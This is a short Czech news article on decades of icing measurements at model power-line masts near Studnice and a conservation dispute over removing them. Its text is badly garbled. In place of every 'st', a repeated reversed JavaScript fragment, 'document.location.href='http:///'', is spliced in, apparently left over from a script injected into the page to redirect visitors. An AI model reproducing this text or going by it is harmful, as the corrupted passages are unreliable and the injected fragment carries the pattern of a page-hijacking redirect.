Rainbow page separator

Námrazové jevy u Studnic vědci sledovali už za první republiky

Pondělí, 4. ledna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Bezmála osm desítek let jsou zaznamenávána data z měřicího zařízení pro výzkum námrazy pomocí s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožárů u místní části Nového Města na Moravě Studnice (784 m.n.m.). Stávající tři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožáry s modelovým elektrickým vedením na místě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí od roku 1980, avšak síla námrazy se tam měřila už v roce 1929, přičemž konkrétní kontinuální data se zachovala od čtyřicátých let minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí. Unikátní výzkum, jehož výsledky slouží například při navrhování nových technologií nebo ochranných prvků přenosových soustav či námrazových map pro energetiku a stavebnictví, byl kdysi záměrně situovaný do oblasti s intenzivním výskytem námrazových jevů.
Se s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožáry u Studnic nacházejícími se v Chráněné krajinné oblasti Žďárské vrchy již patnáct let zásadně nesouhlasí ochranáři. Spor o jejich odstranění se táhne léta. Prostřední ze s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožárů navíc slouží jako telekomunikační a pro přenos interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového signálu. Vědci by rádi u nás i ve světě ojedinělé zařízení na místě zachovali co možná nejdéle, neboť případným přesunem do jiné oblasti nechtějí znehodnotit dlouhou řadu let získávaná data.